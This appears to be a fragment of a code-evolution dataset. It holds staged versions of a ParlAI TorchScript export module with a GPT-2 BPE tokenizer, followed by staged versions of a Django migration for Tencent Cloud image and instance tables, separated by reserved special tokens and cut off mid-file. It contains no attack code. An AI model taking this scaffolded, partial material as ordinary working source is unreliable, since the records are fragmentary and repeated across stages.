\"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n word_tokens = self.gpt2_tokenize(text)\n return word_tokens\n\n def bpe_tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) ->List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) ->str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-5": "#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. and its affiliates.\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom collections import defaultdict\nfrom typing import List, Dict, Optional, Tuple\n\nimport torch.jit\nfrom torch import nn as nn\n\nfrom parlai.core.dict import DictionaryAgent\nfrom parlai.core.torch_agent import TorchAgent\nfrom parlai.utils.bpe import Gpt2BpeHelper\n\n\nclass TorchScriptGreedySearch(nn.Module):\n \"\"\"\n A helper class for exporting simple greedy-search models via TorchScript.\n\n Models with extra inputs will need to override to include more variables.\n \"\"\"\n\n # We currently only support these specific dictionary settings\n CAIRAOKE_DICT_PARAMS = {\n \"dict_class\": \"parlai.core.dict:DictionaryAgent\",\n \"dict_initpath\": None,\n \"dict_language\": \"english\",\n \"dict_max_ngram_size\": -1,\n \"dict_minfreq\": 0,\n \"dict_maxtokens\": -1,\n \"dict_tokenizer\": \"gpt2\",\n \"dict_lower\": False,\n \"dict_textfields\": \"text,labels\",\n \"dict_loaded\": True,\n 'bpe_debug': False,\n }\n\n def __init__(self, agent: TorchAgent):\n super().__init__()\n\n self.is_bart = agent.opt['model'] == 'bart'\n\n # Dictionary/tokenization setup\n for key, val in self.CAIRAOKE_DICT_PARAMS.items():\n assert (\n agent.opt.get(key, val) == val\n ), f'The only currently supported value of \"{key}\" is {val}!'\n orig_dict: DictionaryAgent = agent.dict\n orig_bpe: Gpt2BpeHelper = orig_dict.bpe\n assert all(len(key) == 2 for key in orig_bpe.bpe_ranks.keys())\n assert not any(\n i for key in orig_bpe.bpe_ranks.keys() for i in key if '\\n' in i\n ), \"We need to temporarily merge the bpe_ranks dict's keys with a newline character in order to use it as a TorchScript arg, but at least one of the dict's keys contains a newline character already!\"\n fused_key_bpe_ranks = {\n '\\n'.join(key): float(val) for key, val in orig_bpe.bpe_ranks.items()\n }\n # Cast the values as floats to be able to compare to float('inf') when doing BPE\n # splitting\n self.dict = ScriptableDictionaryAgent(\n null_token=orig_dict.null_token,\n end_token=orig_dict.end_token,\n unk_token=orig_dict.unk_token,\n start_token=orig_dict.start_token,\n freq=orig_dict.freq,\n tok2ind=orig_dict.tok2ind,\n ind2tok=orig_dict.ind2tok,\n bpe_add_prefix_space=agent.opt['bpe_add_prefix_space'],\n bpe_encoder=orig_bpe.encoder,\n bpe_byte_encoder=orig_bpe.byte_encoder,\n fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=agent._get_special_tokens(),\n )\n\n # History tracking and start/end tokens\n self.delimiter_tok = agent.history.delimiter_tok\n self.history_size = agent.opt['history_size']\n if agent.opt.get('history_add_global_end_token', None) is not None:\n self.global_end_token = agent.dict[agent.dict.end_token]\n else:\n self.global_end_token = None\n self.text_truncate = agent.opt.get('text_truncate') or agent.opt['truncate']\n self.text_truncate = self.text_truncate if self.text_truncate >= 0 else None\n\n self.start_idx = agent.model.START_IDX\n self.end_idx = agent.model.END_IDX\n self.null_idx = agent.model.NULL_IDX\n if self.is_bart:\n self.initial_decoder_input = [self.end_idx, self.start_idx]\n else:\n self.initial_decoder_input = [self.start_idx]\n\n agent.model.eval()\n\n # Create versions of the model and decoder that will flatten the incremental\n # state dict, as required by TorchScript\n wrapped_decoder = DecoderIncrStateFlattener(agent.model.decoder)\n wrapped_model = ModelIncrStateFlattener(agent.model)\n\n # Create sample inputs for tracing\n sample_tokens = torch.tensor([[1, 2, 3, 4, 5]], dtype=torch.long)\n encoder_states = agent.model.encoder(sample_tokens)\n initial_generations = self._get_initial_decoder_input(sample_tokens)\n latent, initial_incr_state = wrapped_decoder(\n initial_generations, encoder_states\n )\n logits = agent.model.output(latent[:, -1:, :])\n _, preds = logits.max(dim=2)\n incr_state = {k: torch.clone(v) for k, v in initial_incr_state.items()}\n # Copy the initial incremental state, used when tracing the\n # .reorder_decoder_incremental_state() method below, to avoid having it be\n # mutated by the following line\n incr_state = wrapped_model.reorder_decoder_incremental_state(\n incr_state, torch.tensor([0], dtype=torch.long, device=sample_tokens.device)\n )\n generations = torch.cat([initial_generations, preds], dim=1)\n\n # Do tracing\n self.encoder = torch.jit.trace(agent.model.encoder, sample_tokens)\n self.decoder_first_pass = torch.jit.trace(\n wrapped_decoder, (initial_generations, encoder_states), strict=False\n )\n # We do strict=False to avoid an error when passing a Dict out of\n # decoder.forward()\n self.partially_traced_model = torch.jit.trace_module(\n wrapped_model,\n {\n 'output': (latent[:, -1:, :]),\n 'reorder_decoder_incremental_state': (\n initial_incr_state,\n torch.tensor([0], dtype=torch.long, device=sample_tokens.device),\n ),\n },\n strict=False,\n )\n self.decoder_later_pass = torch.jit.trace(\n wrapped_decoder, (generations, encoder_states, incr_state), strict=False\n )\n\n def _get_initial_decoder_input(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Workaround because we can't use TGM._get_initial_decoder_input() directly.\n\n When we try to call that function, we get a \"RuntimeError: Type 'Tuple[int,\n int]' cannot be traced. Only Tensors and (possibly nested) Lists, Dicts, and\n Tuples of Tensors can be traced\" error.\n \"\"\"\n bsz = x.size(0)\n return (\n torch.tensor(self.initial_decoder_input, dtype=torch.long)\n .expand(bsz, len(self.initial_decoder_input))\n .to(x.device)\n )\n\n def parse(self, text: str) -> List[int]:\n return self.dict.txt2vec(text)\n\n def _v2t(self, vec: List[int]) -> str:\n \"\"\"\n Convert token indices to string of tokens.\n \"\"\"\n new_vec: List[int] = []\n for i in vec:\n if i == self.end_idx:\n break\n elif i != self.start_idx:\n new_vec.append(i)\n return self.dict.vec2txt(new_vec)\n\n def forward(self, context: str, max_len: int = 128) -> str:\n\n # Vectorize all lines of context\n history_vecs: List[List[int]] = []\n context_lines = context.split('\\n')\n if self.history_size > 0:\n context_lines = context_lines[-self.history_size :]\n for line in context_lines:\n history_vecs.append(self.parse(line))\n\n # Get full history vec\n text_vecs: List[List[int]] = []\n for vec in history_vecs[:-1]:\n text_vecs += [vec]\n text_vecs += [self.delimiter_tok]\n text_vecs += [history_vecs[-1]]\n if self.global_end_token is not None:\n text_vecs += [[self.global_end_token]]\n\n # Flatten text_vecs\n flattened_text_vec: List[int] = []\n for vec in text_vecs:\n for token in vec:\n flattened_text_vec.append(token)\n\n # Format history vec given various logic\n if self.text_truncate is not None:\n if self.is_bart:\n truncate_length = self.text_truncate - 2 # Start and end tokens\n else:\n truncate_length = self.text_truncate\n if len(flattened_text_vec) > truncate_length:\n flattened_text_vec = flattened_text_vec[-truncate_length:]\n flattened_text_vec = torch.tensor(flattened_text_vec, dtype=torch.long)\n if self.is_bart:\n flattened_text_vec = torch.cat(\n [\n torch.tensor([self.start_idx], dtype=torch.long),\n flattened_text_vec,\n torch.tensor([self.end_idx], dtype=torch.long),\n ],\n dim=0,\n )\n\n # Pass through the encoder and decoder to generate tokens\n batch_text_vec = torch.unsqueeze(flattened_text_vec, dim=0) # Add batch dim\n encoder_states = self.encoder(batch_text_vec)\n generations = self._get_initial_decoder_input(batch_text_vec)\n # keep track of early stopping if all generations finish\n seen_end = torch.zeros(\n batch_text_vec.size(0), device=batch_text_vec.device, dtype=torch.bool\n )\n incr_state: Dict[str, torch.Tensor] = {}\n for token_idx in range(max_len):\n if token_idx == 0:\n latent, incr_state = self.decoder_first_pass(\n generations, encoder_states\n )\n else:\n latent, incr_state = self.decoder_later_pass(\n generations, encoder_states, incr_state\n )\n logits = self.partially_traced_model.output(latent[:, -1:, :])\n _, preds = logits.max(dim=2)\n incr_state = self.partially_traced_model.reorder_decoder_incremental_state(\n incr_state,\n torch.tensor([0], dtype=torch.long, device=batch_text_vec.device),\n )\n seen_end = seen_end + (preds == self.end_idx).squeeze(1)\n generations = torch.cat([generations, preds], dim=1)\n if torch.all(seen_end):\n break\n\n # Get the label from the generated tokens and update the history\n if self.is_bart:\n assert generations[0, 0].item() == self.end_idx\n generations = generations[:, 1:]\n # Hack: remove initial end token. I haven't found in the code where this is\n # done, but it seems to happen early on during generation\n generation_tokens: List[int] = generations[0].tolist()\n label = self._v2t(generation_tokens)\n\n return label\n\n\nclass BaseIncrStateFlattener(nn.Module):\n \"\"\"\n Flatten/unflatten the incremental state for use with TorchScripting.\n\n Typically, the incremental state will be stored as a Dict[int, Dict[str, Dict[str,\n torch.Tensor]]], where the 3 dictionary levels map decoder layer, attention type,\n and previous key/value/mask, respectively. However, TorchScript expects dicts to be\n of type Dict[str, torch.Tensor], and thus all input incremental states when\n TorchScripting will have to be of that type. We thus unflatten the input incremental\n state, already of type Dict[str, torch.Tensor], to pass it into whatever method\n needs it, and we flatten it again after the updated incremental state is passed back\n out.\n\n This is a base class that provides methods for flattening/unflattening: subclasses\n will call these methods as the incremental state is passed into and out of their own\n methods.\n \"\"\"\n\n def __init__(self, module: nn.Module):\n super().__init__()\n self.module = module\n\n def _unflatten_incr_state(\n self, flat_incr_state: Dict[str, torch.Tensor]\n ) -> Dict[int, Dict[str, Dict[str, torch.Tensor]]]:\n \"\"\"\n Unflatten the input incremental state.\n\n For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in\n structured_incr_state[0]['self_attn']['prev_key'].\n \"\"\"\n structured_incr_state = defaultdict(lambda: defaultdict(dict))\n for key, state in flat_incr_state.items():\n layer_idx_str, attn_type, state_type = key.split('__')\n structured_incr_state[int(layer_idx_str)][attn_type][state_type] = state\n return dict({k: dict(v) for k, v in structured_incr_state.items()})\n # Turn the nested defaultdicts back into regular dicts\n\n def _flatten_incr_state(\n self, structured_incr_state: Dict[int, Dict[str, Dict[str, torch.Tensor]]]\n ) -> Dict[str, torch.Tensor]:\n \"\"\"\n Flatten the input incremental state.\n\n For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored\n in flat_incr_state['layer_0__self_attn__prev_key'].\n \"\"\"\n flat_incr_state = {}\n for layer_idx, dict1 in structured_incr_state.items():\n for attn_type, dict2 in dict1.items():\n for state_type, state in dict2.items():\n key = f'{layer_idx:d}__{attn_type}__{state_type}'\n flat_incr_state[key] = state\n return flat_incr_state\n\n\nclass DecoderIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .forward().\n \"\"\"\n\n def forward(\n self,\n input_: torch.LongTensor,\n encoder_state: Tuple[torch.Tensor, torch.Tensor],\n flat_incr_state: Optional[Dict[str, torch.Tensor]] = None,\n ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n if flat_incr_state is not None:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n else:\n structured_incr_state = None\n tensor, new_structured_incr_state = self.module.forward(\n input=input_, encoder_state=encoder_state, incr_state=structured_incr_state\n )\n new_flat_incr_state = self._flatten_incr_state(new_structured_incr_state)\n return tensor, new_flat_incr_state\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .reorder_decoder_incremental_state(). We also support .output(), which is also\n traced.\n \"\"\"\n\n def reorder_decoder_incremental_state(\n self, flat_incr_state: Dict[str, torch.Tensor], inds: torch.Tensor\n ) -> Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = self.module.reorder_decoder_incremental_state(\n incremental_state=structured_incr_state, inds=inds\n )\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) -> torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) -> List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return ['*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***']\n if text[idx] == \"'\":\n # Capture contradiction suffixes\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1 : idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or (\n text[idx] == ' ' and idx + 1 < len(text) and not text[idx + 1].isspace()\n ):\n # Capture runs of one type of character\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while (\n last_matching_idx + 1 < len(text)\n and text[last_matching_idx + 1].isalpha()\n ):\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while (\n last_matching_idx + 1 < len(text)\n and text[last_matching_idx + 1].isnumeric()\n ):\n last_matching_idx += 1\n else:\n while (\n last_matching_idx + 1 < len(text)\n and not text[last_matching_idx + 1].isspace()\n and not text[last_matching_idx + 1].isalpha()\n and not text[last_matching_idx + 1].isnumeric()\n ):\n last_matching_idx += 1\n tokens.append(text[idx : last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n # Capture runs of space characters up until just before the final one\n last_space_idx = idx + 1\n while (\n last_space_idx + 1 < len(text)\n and text[last_space_idx + 1].isspace()\n ):\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n # Include the last char, which is a space char\n tokens.append(text[idx : last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n # Capture runs of space characters\n last_space_idx = idx\n while (\n last_space_idx + 1 < len(text)\n and text[last_space_idx + 1].isspace()\n ):\n last_space_idx += 1\n tokens.append(text[idx : last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(\n self,\n add_prefix_space: bool,\n encoder: Dict[str, str],\n byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str],\n ):\n\n self.add_prefix_space = add_prefix_space\n\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in self.encoder.items():\n self.decoder[v] = k\n\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n\n self.bpe_ranks = fused_key_bpe_ranks\n\n # special tokens\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) -> List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n\n # constants for readability\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n # special token detected, replace the chunk with small subchunks\n # split by the special token\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n # add the special token as a delimiter\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n\n return output\n\n def get_pairs(self, word: List[str]) -> List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) -> List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n\n if len(pairs) == 0:\n return word\n\n while True:\n min_rank = self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf'))\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n\n if word[i] == first and i < len(word) - 1 and word[i + 1] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) -> List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) -> str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) -> str:\n \"\"\"\n Decode list of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n # We iterate over \"char\", which is supposed to be a single\n # character, because the TorchScripted version of the code\n # correctly splits a string into single characters in\n # self.utf8_chars() but the non-TorchScripted version doesn't\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) -> List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 0b10000000:\n chars.append(s[i])\n i += 1\n else:\n if byte < 0b11100000:\n num_bytes = 2\n elif byte < 0b11110000:\n num_bytes = 3\n elif byte < 0b11111000:\n num_bytes = 4\n elif byte < 0b11111100:\n num_bytes = 5\n elif byte < 0b11111110:\n num_bytes = 6\n elif byte < 0b11111111:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i : i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(\n self,\n null_token: str,\n end_token: str,\n unk_token: str,\n start_token: str,\n freq: Dict[str, int],\n tok2ind: Dict[str, int],\n ind2tok: Dict[int, str],\n bpe_add_prefix_space: bool,\n bpe_encoder: Dict[str, str],\n bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str],\n ):\n\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n\n # cache unk token for later\n self._unk_token_idx = self.tok2ind[self.unk_token]\n\n # Initialize tokenizer\n self.bpe = ScriptableGpt2BpeHelper(\n add_prefix_space=bpe_add_prefix_space,\n encoder=bpe_encoder,\n byte_encoder=bpe_byte_encoder,\n fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens,\n )\n\n def _word_lookup(self, key: str) -> int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) -> str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) -> List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n\n # calls the selected tokenizer function e.g. 're' => re_tokenize(text)\n word_tokens = self.gpt2_tokenize(text)\n\n return word_tokens\n\n def bpe_tokenize(self, text: str) -> List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) -> List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) -> str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-ids": [
24,
31,
32,
36,
43
]
}
|
[
24,
31,
32,
36,
43
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('home_application', '0019_auto_20170809_1810')]
operations = [migrations.CreateModel(name='QcloudImageInfo', fields=[(
'id', models.AutoField(verbose_name='ID', serialize=False,
auto_created=True, primary_key=True)), ('image_id', models.
CharField(max_length=50, verbose_name='镜像id')), ('osname', models.
CharField(max_length=50, verbose_name='操作系统名称')), ('image_size',
models.CharField(max_length=50, verbose_name='操作系统容量(GiB)')), (
'image_type', models.IntegerField(verbose_name='镜像类型')), (
'created_time', models.CharField(max_length=50, verbose_name=
'镜像创建时间')), ('image_state', models.CharField(max_length=50,
verbose_name='镜像状态')), ('image_source', models.CharField(max_length
=50, verbose_name='镜像来源')), ('image_name', models.CharField(
max_length=50, verbose_name='镜像名称')), ('image_description', models.
CharField(max_length=50, verbose_name='镜像详细描述')), ('image_creator',
models.CharField(max_length=50, verbose_name='镜像创建者')), (
'operation_mask', models.CharField(max_length=50, verbose_name=''))
], options={'db_table': 'qcloud_image_info'}), migrations.
CreateModel(name='QcloudInstanceInfo', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('instance_id', models.CharField(max_length=50,
verbose_name='实例id')), ('instance_name', models.CharField(
max_length=50, verbose_name='实例名称')), ('instance_type', models.
CharField(max_length=50, verbose_name='实例类型')), ('cpu', models.
CharField(max_length=50, verbose_name='cpu')), ('memory', models.
CharField(max_length=50, verbose_name='内存')), ('status', models.
CharField(max_length=50, verbose_name='实例状态')), ('zone', models.
CharField(max_length=50, verbose_name='实例所属地域')), (
'instance_charge_type', models.CharField(max_length=50,
verbose_name='实例计费模式')), ('private_ip_addresses', models.CharField(
max_length=50, verbose_name='内网ip')), ('public_ip_addresses',
models.CharField(max_length=50, verbose_name='外网ip')), ('image_id',
models.CharField(max_length=50, verbose_name='镜像id')), ('os_name',
models.CharField(max_length=50, verbose_name='操作系统名称')), (
'system_disk_type', models.CharField(max_length=50, verbose_name=
'系统盘类型')), ('system_disk_size', models.CharField(max_length=50,
verbose_name='系统盘尺寸')), ('renew_flag', models.CharField(max_length=
50, verbose_name='自动续费标识')), ('internet_max_bandwidth_out', models.
CharField(max_length=50, verbose_name='实例网络带宽上限')), (
'internet_charge_type', models.CharField(max_length=50,
verbose_name='实例网络计费类型')), ('created_time', models.DateTimeField(
default=django.utils.timezone.now, verbose_name='实例创建时间')), (
'expired_time', models.DateTimeField(default=django.utils.timezone.
now, verbose_name='实例到期时间'))], options={'db_table':
'qcloud_instance_info'})]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [('home_application', '0019_auto_20170809_1810')]
operations = [migrations.CreateModel(name='QcloudImageInfo', fields=[(
'id', models.AutoField(verbose_name='ID', serialize=False,
auto_created=True, primary_key=True)), ('image_id', models.
CharField(max_length=50, verbose_name='镜像id')), ('osname', models.
CharField(max_length=50, verbose_name='操作系统名称')), ('image_size',
models.CharField(max_length=50, verbose_name='操作系统容量(GiB)')), (
'image_type', models.IntegerField(verbose_name='镜像类型')), (
'created_time', models.CharField(max_length=50, verbose_name=
'镜像创建时间')), ('image_state', models.CharField(max_length=50,
verbose_name='镜像状态')), ('image_source', models.CharField(max_length
=50, verbose_name='镜像来源')), ('image_name', models.CharField(
max_length=50, verbose_name='镜像名称')), ('image_description', models.
CharField(max_length=50, verbose_name='镜像详细描述')), ('image_creator',
models.CharField(max_length=50, verbose_name='镜像创建者')), (
'operation_mask', models.CharField(max_length=50, verbose_name=''))
], options={'db_table': 'qcloud_image_info'}), migrations.
CreateModel(name='QcloudInstanceInfo', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('instance_id', models.CharField(max_length=50,
verbose_name='实例id')), ('instance_name', models.CharField(
max_length=50, verbose_name='实例名称')), ('instance_type', models.
CharField(max_length=50, verbose_name='实例类型')), ('cpu', models.
CharField(max_length=50, verbose_name='cpu')), ('memory', models.
CharField(max_length=50, verbose_name='内存')), ('status', models.
CharField(max_length=50, verbose_name='实例状态')), ('zone', models.
CharField(max_length=50, verbose_name='实例所属地域')), (
'instance_charge_type', models.CharField(max_length=50,
verbose_name='实例计费模式')), ('private_ip_addresses', models.CharField(
max_length=50, verbose_name='内网ip')), ('public_ip_addresses',
models.CharField(max_length=50, verbose_name='外网ip')), ('image_id',
models.CharField(max_length=50, verbose_name='镜像id')), ('os_name',
models.CharField(max_length=50, verbose_name='操作系统名称')), (
'system_disk_type', models.CharField(max_length=50, verbose_name=
'系统盘类型')), ('system_disk_size', models.CharField(max_length=50,
verbose_name='系统盘尺寸')), ('renew_flag', models.CharField(max_length=
50, verbose_name='自动续费标识')), ('internet_max_bandwidth_out', models.
CharField(max_length=50, verbose_name='实例网络带宽上限')), (
'internet_charge_type', models.CharField(max_length=50,
verbose_name='实例网络计费类型')), ('created_time', models.DateTimeField(
default=django.utils.timezone.now, verbose_name='实例创建时间')), (
'expired_time', models.DateTimeField(default=django.utils.timezone.
now, verbose_name='实例到期时间'))], options={'db_table':
'qcloud_instance_info'})]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('home_application', '0019_auto_20170809_1810'),
]
operations = [
migrations.CreateModel(
name='QcloudImageInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image_id', models.CharField(max_length=50, verbose_name='\u955c\u50cfid')),
('osname', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u540d\u79f0')),
('image_size', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u5bb9\u91cf\uff08GiB\uff09')),
('image_type', models.IntegerField(verbose_name='\u955c\u50cf\u7c7b\u578b')),
